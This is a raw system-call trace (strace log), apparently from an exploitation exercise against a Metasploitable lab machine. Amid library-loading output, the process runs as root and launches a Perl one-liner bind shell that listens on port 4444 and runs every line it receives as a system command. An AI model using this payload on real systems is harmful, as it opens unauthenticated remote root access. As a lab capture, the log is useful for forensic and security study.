\4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
10450 20:06:44.894325 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
10450 20:06:44.894342 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da9000
10450 20:06:44.894352 mmap2(0xb7dbd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dbd000
10450 20:06:44.894367 mmap2(0xb7dbf000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dbf000
10450 20:06:44.894381 close(1)          = 0
10450 20:06:44.894407 munmap(0xb7f4f000, 29913) = 0
10450 20:06:44.894450 open("/etc/ld.so.cache", O_RDONLY) = 1
10450 20:06:44.894465 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
10450 20:06:44.894495 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f4f000
10450 20:06:44.894505 close(1)          = 0
10450 20:06:44.894516 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.894530 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
10450 20:06:44.894544 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
10450 20:06:44.894631 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
10450 20:06:44.894648 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9f000
10450 20:06:44.894659 mmap2(0xb7da7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7da7000
10450 20:06:44.894679 close(1)          = 0
10450 20:06:44.894692 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10450 20:06:44.894705 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
10450 20:06:44.894719 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
10450 20:06:44.901896 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
10450 20:06:44.901948 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d94000
10450 20:06:44.901960 mmap2(0xb7d9d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d9d000
10450 20:06:44.901978 close(1)          = 0
10450 20:06:44.902000 munmap(0xb7f4f000, 29913) = 0
10450 20:06:44.902017 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
10450 20:06:44.902031 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
10450 20:06:44.902043 _llseek(1, 0, [0], SEEK_CUR) = 0
10450 20:06:44.902054 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
10450 20:06:44.902071 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f56000
10450 20:06:44.902081 _llseek(1, 1624, [1624], SEEK_SET) = 0
10450 20:06:44.902096 munmap(0xb7f56000, 1624) = 0
10450 20:06:44.902106 close(1)          = 0
10450 20:06:44.902134 getpgrp()         = 3831
10450 20:06:44.902144 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
10450 20:06:44.902159 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
10450 20:06:44.902174 brk(0x8101000)    = 0x8101000
10450 20:06:44.902206 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
10450 20:06:44.902220 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
10450 20:06:44.902234 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
10450 20:06:44.902270 brk(0x8102000)    = 0x8102000
10450 20:06:44.902296 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
10450 20:06:44.902314 stat64("/sbin/AB", 0xbfdcc428) = -1 ENOENT (No such file or directory)
10450 20:06:44.902327 stat64("/bin/AB", 0xbfdcc428) = -1 ENOENT (No such file or directory)
10450 20:06:44.902338 stat64("/usr/sbin/AB", 0xbfdcc428) = -1 ENOENT (No such file or directory)
10450 20:06:44.902350 stat64("/usr/bin/AB", 0xbfdcc428) = -1 ENOENT (No such file or directory)
10450 20:06:44.911876 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
10450 20:06:44.911896 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dca6f8) = 10451
10451 20:06:44.911950 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
10451 20:06:44.911967 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
10451 20:06:44.911980 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
10451 20:06:44.911992 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
10451 20:06:44.912008 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
10451 20:06:44.912024 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
10451 20:06:44.912037 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
10451 20:06:44.912096 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
10451 20:06:44.912117 --- SIGPIPE (Broken pipe) @ 0 (0) ---
10451 20:06:44.912194 exit_group(127)   = ?
10450 20:06:45.021968 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
4519  20:06:45.021997 waitpid(10450,  <unfinished ...>
10450 20:06:45.022012 <... rt_sigprocmask resumed> NULL, 8) = 0
10450 20:06:45.302706 --- SIGCHLD (Child exited) @ 0 (0) ---
10450 20:06:45.302832 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10451
10450 20:06:45.302923 waitpid(-1, 0xbfdcc0a8, WNOHANG) = -1 ECHILD (No child processes)
10450 20:06:45.302966 sigreturn()       = ? (mask now [])
10450 20:06:45.303008 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
10450 20:06:45.303037 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
10450 20:06:45.303054 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
10450 20:06:45.303067 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
10450 20:06:45.303085 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
10450 20:06:45.303097 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
10450 20:06:45.303133 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
10450 20:06:45.303153 stat64("/sbin/perl", 0xbfdcc458) = -1 ENOENT (No such file or directory)
10450 20:06:45.303166 stat64("/bin/perl", 0xbfdcc458) = -1 ENOENT (No such file or directory)
10450 20:06:45.303177 stat64("/usr/sbin/perl", 0xbfdcc458) = -1 ENOENT (No such file or directory)
10450 20:06:45.303189 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
10450 20:06:45.303207 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
10450 20:06:45.303232 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
10450 20:06:45.303247 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dca6f8) = 10452
10452 20:06:45.532377 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
10452 20:06:45.532377 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
10452 20:06:45.532378 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
10452 20:06:45.532378 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
10452 20:06:45.532378 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
10452 20:06:45.532378 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
10452 20:06:45.532378 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
10452 20:06:45.532396 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
10452 20:06:45.532516 brk(0)            = 0x8153000
10452 20:06:45.532539 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10452 20:06:45.532556 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f51000
10452 20:06:45.532573 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
10452 20:06:45.532590 open("/etc/ld.so.cache", O_RDONLY) = 1
10452 20:06:45.532603 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
10452 20:06:45.532622 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f49000
10452 20:06:45.532632 close(1)          = 0
10452 20:06:45.532644 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10452 20:06:45.532659 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
10452 20:06:45.532674 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
10452 20:06:45.532774 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
10452 20:06:45.532793 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f45000
10452 20:06:45.532806 mmap2(0xb7f47000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f47000
10452 20:06:45.532822 close(1)          = 0
10452 20:06:45.532834 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10452 20:06:45.532848 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1
10452 20:06:45.532862 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512
10452 20:06:45.532951 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0
10452 20:06:45.532969 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f20000
10452 20:06:45.532980 mmap2(0xb7f43000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f43000
10452 20:06:45.533004 close(1)          = 0
10452 20:06:45.533044 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10452 20:06:45.533076 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1
10452 20:06:45.533090 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512
10452 20:06:45.533178 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0
10452 20:06:45.533195 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f1f000
10452 20:06:45.533209 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f07000
10452 20:06:45.533224 mmap2(0xb7f1b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f1b000
10452 20:06:45.533240 mmap2(0xb7f1d000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f1d000
10452 20:06:45.533254 close(1)          = 0
10452 20:06:45.533266 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10452 20:06:45.533279 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
10452 20:06:45.533293 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
10452 20:06:45.533382 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
10452 20:06:45.533400 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db8000
10452 20:06:45.533412 mmap2(0xb7f01000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f01000
10452 20:06:45.533427 mmap2(0xb7f04000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f04000
10452 20:06:45.533441 close(1)          = 0
10452 20:06:45.533453 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
10452 20:06:45.533466 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1
10452 20:06:45.533481 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512
10452 20:06:45.533579 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0
10452 20:06:45.533597 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d86000
10452 20:06:45.533608 mmap2(0xb7d8f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d8f000
10452 20:06:45.533623 mmap2(0xb7d91000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d91000
10452 20:06:45.533637 close(1)          = 0
10452 20:06:45.533661 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d85000
10452 20:06:45.533678 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d858c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
10452 20:06:45.533738 mprotect(0xb7f01000, 4096, PROT_READ) = 0
10452 20:06:45.533766 munmap(0xb7f49000, 29913) = 0
10452 20:06:45.533779 set_tid_address(0xb7d85908) = 10452
10452 20:06:45.533788 set_robust_list(0xb7d85910, 0xc) = 0
10452 20:06:45.533798 futex(0xbfd4e9e0, 0x81 /* FUTEX_??? */, 1) = 0
10452 20:06:45.533814 rt_sigaction(SIGRTMIN, {0xb7f0b2c0, [], SA_SIGINFO}, NULL, 8) = 0
10452 20:06:45.533827 rt_sigaction(SIGRT_1, {0xb7f0b340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0
10452 20:06:45.533840 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
10452 20:06:45.533854 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
10452 20:06:45.533874 uname({sys="Linux", node="metasploitable", ...}) = 0
10452 20:06:45.533922 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0
10452 20:06:45.533969 brk(0)            = 0x8153000
10452 20:06:45.533978 brk(0x8174000)    = 0x8174000
10452 20:06:45.534038 getuid32()        = 0
10452 20:06:45.534050 geteuid32()       = 0
10452 20:06:45.534059 getgid32()        = 0
10452 20:06:45.534068 getegid32()       = 0
10452 20:06:45.534106 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d64000
10452 20:06:45.534135 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1
10452 20:06:45.534153 read(1, "b\360]\24", 4) = 4
10452 20:06:45.534166 close(1)          = 0
10452 20:06:45.534184 time(NULL)        = 1495670805
